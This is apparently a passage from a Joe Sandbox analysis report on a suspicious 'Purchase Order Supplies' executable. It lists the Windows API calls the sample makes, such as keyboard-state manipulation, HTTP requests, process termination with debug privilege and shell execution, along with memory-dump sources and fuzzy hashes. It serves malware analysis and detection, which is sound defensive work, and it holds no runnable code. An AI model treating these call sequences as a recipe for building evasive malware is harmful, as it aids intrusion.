                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4AA7
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CD4AB9
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4AD2
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4AE4
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4B29
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4B3E
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00CD3AD7,?,00000001), ref: 00CD4B49
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          APIs
                          • GetClientRect.USER32(?), ref: 00D0EC32
                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00D0EC49
                          • GetWindowDC.USER32(?), ref: 00D0EC55
                          • GetPixel.GDI32(00000000,?,?), ref: 00D0EC64
                          • ReleaseDC.USER32(?,00000000), ref: 00D0EC76
                          • GetSysColor.USER32(00000005), ref: 00D0EC94
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                          • String ID:
                          • API String ID: 272304278-0
                          APIs
                          • EnumChildWindows.USER32(?,00CCDD46), ref: 00CCDC86
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ChildEnumWindows
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 3555792229-1603158881
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C945F0
                          • CoUninitialize.COMBASE ref: 00C94695
                          • UnregisterHotKey.USER32(?), ref: 00C947BD
                          • DestroyWindow.USER32(?), ref: 00D05936
                          • FreeLibrary.KERNEL32(?), ref: 00D0599D
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D059CA
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 469580280-3243417748
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 00CAC2D2
                            • Part of subcall function 00CAC697: GetClientRect.USER32(?,?), ref: 00CAC6C0
                            • Part of subcall function 00CAC697: GetWindowRect.USER32(?,?), ref: 00CAC701
                            • Part of subcall function 00CAC697: ScreenToClient.USER32(?,?), ref: 00CAC729
                          • GetDC.USER32 ref: 00D0E006
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D0E019
                          • SelectObject.GDI32(00000000,00000000), ref: 00D0E027
                          • SelectObject.GDI32(00000000,00000000), ref: 00D0E03C
                          • ReleaseDC.USER32(?,00000000), ref: 00D0E044
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D0E0CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE4C5E
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CE4C8A
                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00CE4CCC
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CE4CE1
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CE4CEE
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00CE4D1E
                          • InternetCloseHandle.WININET(00000000), ref: 00CE4D65
                            • Part of subcall function 00CE56A9: GetLastError.KERNEL32(?,?,00CE4A2B,00000000,00000000,00000001), ref: 00CE56BE
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                          • String ID:
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00D2DBF0), ref: 00CEBBA1
                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00D2DBF0), ref: 00CEBBD5
                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CEBD33
                          • SysFreeString.OLEAUT32(?), ref: 00CEBD5D
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00CEBEAD
                          • ProgIDFromCLSID.COMBASE(?,?), ref: 00CEBEF7
                          • CoTaskMemFree.COMBASE(?), ref: 00CEBF14
                          Similarity
                          • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                          • String ID:
                          APIs
                            • Part of subcall function 00C949CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C94954,00000000), ref: 00C94A23
                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00CAB85B), ref: 00CAB926
                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00CAB85B,00000000,?,?,00CAAF1E,?,?), ref: 00CAB9BD
                          • DestroyAcceleratorTable.USER32(00000000), ref: 00D0E775
                          • DeleteObject.GDI32(00000000), ref: 00D0E7EB
                          Similarity
                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                          • String ID:
                          APIs
                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CFB204
                          Similarity
                          • API ID: InvalidateRect
                          • String ID:
                          APIs
                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00D0E9EA
                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D0EA0B
                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00D0EA20
                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00D0EA3D
                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00D0EA64
                          • DestroyCursor.USER32(00000000), ref: 00D0EA6F
                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00D0EA8C
                          • DestroyCursor.USER32(00000000), ref: 00D0EA97
                          Similarity
                          • API ID: CursorDestroyExtractIconImageLoadMessageSend
                          • String ID:
                          APIs
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00D0E9A0,00000004,00000000,00000000), ref: 00CAF737
                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00D0E9A0,00000004,00000000,00000000), ref: 00CAF77E
                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00D0E9A0,00000004,00000000,00000000), ref: 00D0EB55
                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00D0E9A0,00000004,00000000,00000000), ref: 00D0EBC1
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          APIs
                            • Part of subcall function 00CCE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00CCE158
                            • Part of subcall function 00CCE138: GetCurrentThreadId.KERNEL32 ref: 00CCE15F
                            • Part of subcall function 00CCE138: AttachThreadInput.USER32(00000000,?,00CCCDFB,?,00000001), ref: 00CCE166
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CCCE06
                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00CCCE23
                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00CCCE26
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CCCE2F
                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00CCCE4D
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CCCE50
                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00CCCE59
                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00CCCE70
                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00CCCE73
                          Similarity
                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                          • String ID:
                          APIs
                            • Part of subcall function 00CD6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00CD6F7D
                            • Part of subcall function 00CD6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00CD6F8D
                            • Part of subcall function 00CD6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00CD7022
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CF168B
                          • GetLastError.KERNEL32 ref: 00CF169E
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CF16CA
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00CF1746
                          • GetLastError.KERNEL32(00000000), ref: 00CF1751
                          • CloseHandle.KERNEL32(00000000), ref: 00CF1786
                          Similarity
                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                          • String ID: SeDebugPrivilege
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00CF9926
                          • SendMessageW.USER32(?,00001036,00000000), ref: 00CF993A
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?,SysListView32,00D2DBF0,?,?,?), ref: 00CF9954
                          • _wcscat.LIBCMT ref: 00CF99AF
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00CF99C6
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00CF99F4
                          Similarity
                          • API ID: MessageSend$Window_wcscat
                          • String ID: SysListView32
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 00CD62D6
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00CD7595
                          • LoadStringW.USER32(00000000), ref: 00CD759C
                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CD75B2
                          • LoadStringW.USER32(00000000), ref: 00CD75B9
                          • _wprintf.LIBCMT ref: 00CD75DF
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD75FD
                          Strings
                          • %s (%d) : ==> %s: %s %s, xrefs: 00CD75DA
                          Similarity
                          • API ID: HandleLoadModuleString$Message_wprintf
                          • String ID: %s (%d) : ==> %s: %s %s
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00CF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF2AA6,?,?), ref: 00CF3B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF2AE7
                          Similarity
                          • API ID: BuffCharConnectRegistryUpper_memmove
                          • String ID:
                          APIs
                          • select.WS2_32 ref: 00CE9B38
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9B45
                          • __WSAFDIsSet.WS2_32(00000000,?), ref: 00CE9B6F
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE9B9F
                          • htons.WS2_32(?), ref: 00CE9C51
                          • inet_ntoa.WS2_32(?), ref: 00CE9C0C
                            • Part of subcall function 00CCE0F5: _strlen.LIBCMT ref: 00CCE0FF
                            • Part of subcall function 00CCE0F5: _memmove.LIBCMT ref: 00CCE121
                          • _strlen.LIBCMT ref: 00CE9CA7
                          • _memmove.LIBCMT ref: 00CE9D10
                          Similarity
                          • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                          • String ID:
                          APIs
                          • __mtinitlocknum.LIBCMT ref: 00CBB744
                            • Part of subcall function 00CB8A0C: __FF_MSGBANNER.LIBCMT ref: 00CB8A21
                            • Part of subcall function 00CB8A0C: __NMSG_WRITE.LIBCMT ref: 00CB8A28
                            • Part of subcall function 00CB8A0C: __malloc_crt.LIBCMT ref: 00CB8A48
                          • __lock.LIBCMT ref: 00CBB757
                          • __lock.LIBCMT ref: 00CBB7A3
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00D46948,00000018,00CC6C2B,?,00000000,00000109), ref: 00CBB7BF
                          • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00CBB7DC
                          • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00CBB7EC
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                          • String ID:
                          • API String ID: 1422805418-0
                          • Opcode ID: cdf7d10f3edf30c61a909eb74c70f26f8fac9a2ff4d53f7498b012c884881332
                          • Instruction ID: 82b72f7e4a4d7b2482e5b7cf99e5199502c4b33f5ad9170f8abb4f240eb6bd8a
                          • Opcode Fuzzy Hash: cdf7d10f3edf30c61a909eb74c70f26f8fac9a2ff4d53f7498b012c884881332
                          • Instruction Fuzzy Hash: 54412571D007159BEB109FA8D8443ECBBA8BF41336F148319E825AB2D1CBB59D05CFA0
                          APIs
                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CDA1CE
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CDA205
                          • RtlEnterCriticalSection.NTDLL(?), ref: 00CDA221
                          • _memmove.LIBCMT ref: 00CDA26F
                          • _memmove.LIBCMT ref: 00CDA28C
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00CDA29B
                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CDA2B0
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CDA2CF
                          Similarity
                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                          • String ID:
                          • API String ID: 256516436-0
                          • Opcode ID: b10230d9a006b24e37fe4258e58a3bd1a7cce7024719a61cb7b822a6b2364649
                          • Instruction ID: 05079cf8cc327e27ea65abf67d08c43cc8a539ba6696ca09c5038670cb93e2ee
                          • Opcode Fuzzy Hash: b10230d9a006b24e37fe4258e58a3bd1a7cce7024719a61cb7b822a6b2364649
                          • Instruction Fuzzy Hash: 4A317E31A00205ABCB00EFA9DC85AAEB7B9EF45310F1480A5F904EB256DB74DE55DBA1
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00CF8CF3
                          • GetDC.USER32(00000000), ref: 00CF8CFB
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF8D06
                          • ReleaseDC.USER32(00000000,00000000), ref: 00CF8D12
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00CF8D4E
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CF8D5F
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CFBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00CF8D99
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CF8DB9
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: b4a78320504583450cbf74164a4fcaeaf9b324933773c8de4eb9330ff97f608d
                          • Instruction ID: 381e1510e358f5ff26993a2e9b5fa97ff71fc617358e9bb397202b22a9bacbeb
                          • Opcode Fuzzy Hash: b4a78320504583450cbf74164a4fcaeaf9b324933773c8de4eb9330ff97f608d
                          • Instruction Fuzzy Hash: 24317F72100618BFEB108F50CC49FEA3BAAEF49755F048055FE08DA291CB759942CB70
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 493943a6f923665bf29ace685a97605a994b91749922f114855f2a071fa52ef8
                          • Instruction ID: 39a29c31c28cc6e61d85c929b07b649e0da52b509fe0aa10d555c6f8a4307eaf
                          • Opcode Fuzzy Hash: 493943a6f923665bf29ace685a97605a994b91749922f114855f2a071fa52ef8
                          • Instruction Fuzzy Hash: 74715D7190020AFFCB15CF99CC48ABEBB75FF8A318F248159F915A6292C7349E41DB64
                          APIs
                          • _memset.LIBCMT ref: 00CF214B
                          • _memset.LIBCMT ref: 00CF2214
                          • ShellExecuteExW.SHELL32(?), ref: 00CF2259
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                            • Part of subcall function 00C93BCF: _wcscpy.LIBCMT ref: 00C93BF2
                          • CloseHandle.KERNEL32(00000000), ref: 00CF2320
                          • FreeLibrary.KERNEL32(00000000), ref: 00CF232F
                          Strings
                          Similarity
                          • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                          • String ID: @
                          • API String ID: 4082843840-2766056989
                          • Opcode ID: 26a132a9f6328d1116b83bc7d765e5536ffce4044697bb821ac128d63b5bdb89
                          • Instruction ID: 1f72dc06bf0de8572e24cda88f5191ecfe4a22d49614545fd6f3acdca04f5752
                          • Opcode Fuzzy Hash: 26a132a9f6328d1116b83bc7d765e5536ffce4044697bb821ac128d63b5bdb89
                          • Instruction Fuzzy Hash: 4171BCB0A00619DFCF04EFA4C8949AEB7F5FF49310F108059E956AB361CB34AE40DB91
                          APIs
                          • GetParent.USER32(?), ref: 00CD481D
                          • GetKeyboardState.USER32(?), ref: 00CD4832
                          • SetKeyboardState.USER32(?), ref: 00CD4893
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CD48C1
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CD48E0
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CD4926
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CD4949
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 4ecadb001c96ef67b738ab0f50c77f6d68de7f0d9d5f0ea575bc2a892b178e6d
                          • Instruction ID: 2afe53f66e3614a717e88b1087afddce1f795d0be47f5dcbfa266a79888de81e
                          • Opcode Fuzzy Hash: 4ecadb001c96ef67b738ab0f50c77f6d68de7f0d9d5f0ea575bc2a892b178e6d
                          • Instruction Fuzzy Hash: 9551D5A05087D53FFB3A4325CC55BBBBF995B06304F08858AE3E5966C2C6E4EE84E750
                          APIs
                          • GetParent.USER32(00000000), ref: 00CD4638
                          • GetKeyboardState.USER32(?), ref: 00CD464D
                          • SetKeyboardState.USER32(?), ref: 00CD46AE
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CD46DA
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CD46F7
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CD473B
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CD475C
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 511e8b8290eeabcdffecc2c2dfaa2f5714705386d7cb7b9acfda39b9be615bf7
                          • Instruction ID: df4a5cc9b2be7d2b77924973c22126e0a987e05211ebc1e3f8115d4327a6db4e
                          • Opcode Fuzzy Hash: 511e8b8290eeabcdffecc2c2dfaa2f5714705386d7cb7b9acfda39b9be615bf7
                          • Instruction Fuzzy Hash: E751D6A05047D53FFB3A47248C45BBABF995B07304F08848AF3E546AC2D7A4EE95E760
                          APIs
                          Similarity
                          • API ID: _wcsncpy$LocalTime
                          • String ID:
                          • API String ID: 2945705084-0
                          • Opcode ID: a5d30931d340539a8ea61036e4e4d7400833657758bfc63cc5cde7ef04b69fce
                          • Instruction ID: 0a29d1ee7e8c24c469a7f262721d1e690dbc044f690da7b419cb085e1a18c341
                          • Opcode Fuzzy Hash: a5d30931d340539a8ea61036e4e4d7400833657758bfc63cc5cde7ef04b69fce
                          • Instruction Fuzzy Hash: D1414D75C1021475DF10EBB4CC86ACFB7BCAF05310F958866EA24F3262EA30E25597A5
                          APIs
                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00CF8DF4
                          • GetWindowLongW.USER32(0136B2C0,000000F0), ref: 00CF8E27
                          • GetWindowLongW.USER32(0136B2C0,000000F0), ref: 00CF8E5C
                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00CF8E8E
                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00CF8EB8
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CF8EC9
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CF8EE3
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: bc0d881729528c92475a870e24b7051575af797cb992478b12c373ad6978aa54
                          • Instruction ID: 89760535837d54e2cd086cda5f65a75d8641809461180177cc447bc6217bae76
                          • Opcode Fuzzy Hash: bc0d881729528c92475a870e24b7051575af797cb992478b12c373ad6978aa54
                          • Instruction Fuzzy Hash: 98312239600218AFDB608F58DC85FA53BA1EB4A314F1541A4FA25CB3B2CF61AD45DB62
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD1734
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00CD175A
                          • SysAllocString.OLEAUT32(00000000), ref: 00CD175D
                          • SysAllocString.OLEAUT32(?), ref: 00CD177B
                          • SysFreeString.OLEAUT32(?), ref: 00CD1784
                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 00CD17A9
                          • SysAllocString.OLEAUT32(?), ref: 00CD17B7
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: 1d0c222e767ad2913d759dd05fe79fa4c2c1c07b56fb728282d2b54353ef7683
                          • Instruction ID: 80fd928945b87b014af2919869f76abef92ce41425a6e8fce25f82b5bbf7b0e5
                          • Opcode Fuzzy Hash: 1d0c222e767ad2913d759dd05fe79fa4c2c1c07b56fb728282d2b54353ef7683
                          • Instruction Fuzzy Hash: 85214F75600219BF9B109BA9DC88CFB73ADEB09360B558126FE15DB360DB74ED418760
                          APIs
                            • Part of subcall function 00C931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C931DA
                          • lstrcmpiW.KERNEL32(?,?), ref: 00CD6A2B
                          • _wcscmp.LIBCMT ref: 00CD6A49
                          • MoveFileW.KERNEL32(?,?), ref: 00CD6A62
                            • Part of subcall function 00CD6D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00CD6DBA
                            • Part of subcall function 00CD6D6D: GetLastError.KERNEL32 ref: 00CD6DC5
                            • Part of subcall function 00CD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CD6DD9
                          • _wcscat.LIBCMT ref: 00CD6AA4
                          • SHFileOperationW.SHELL32(?), ref: 00CD6B0C
                          Strings
                          Similarity
                          • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                          • String ID: \*.*
                          • API String ID: 2323102230-1173974218
                          • Opcode ID: 258f592e8cada9548dad8a2a2df623ea08a0326fb8b92afc4bc1ff822e997699
                          • Instruction ID: ed6e0e9bc8afcc61e97a74113ceea8b61f26bd51505f413207b832f35f6932c0
                          • Opcode Fuzzy Hash: 258f592e8cada9548dad8a2a2df623ea08a0326fb8b92afc4bc1ff822e997699
                          • Instruction Fuzzy Hash: 6F3134719002186ACF50EFB4D845BDDB7B8AF08300F5445EBE519E3251EB349B89DF64
                          APIs
                          Strings
